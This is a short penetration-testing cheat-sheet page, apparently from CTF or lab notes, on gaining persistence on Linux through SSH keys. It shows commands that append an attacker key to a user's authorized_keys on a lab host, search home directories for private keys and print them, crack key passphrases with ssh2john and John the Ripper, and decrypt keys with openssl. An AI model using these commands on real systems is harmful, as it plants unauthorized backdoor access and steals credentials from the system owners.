Persistence

SSHKey Injection
Generate SSH Keys
ssh-keygen -t ed25519 -f key
To make sure the execute properly give it restricted permissions:
chmod 600 id_rsa

  • If authorized_keys file doesn't exist create one with your public key:

echo "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJsqrD2TiYF/KEidiuQncxpjkUU4CDS2A3lmhz1jeHIi b0llull0s@p4n1c" > /home/dvir/.ssh/authorized_keys

  • Other wise append your public key:

echo "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJsqrD2TiYF/KEidiuQncxpjkUU4CDS2A3lmhz1jeHIi b0llull0s@p4n1c" >> /home/dvir/.ssh/authorized_keys
Now just connect with your private key:
ssh -i key dvir@10.10.11.8

Using Existing keys

Look for the private key
find /home/user -name "id_*" -exec cat {} \;

  • Once you find it, just copy the key in your .ssh directory and ssh in.

  • Also you can, check If the Corresponding private/public Key is known by using this repo.

Crack the passphrase

  • Use ssh2john to generate a hash from the key:

ssh2john private_key > private_key.hash

  • Then feed this hash into John the Ripper:

john private_key.hash --wordlist=/path/to/wordlist

Clone the key

  • Sometimes you may need to copy an encrypted key to its decrypted version:

openssl rsa -in spanishdancer.key -out ~/keys/ariekei-spanishdancer
PreviousLateral MovementNextLinux Privilege Escalation

Last updated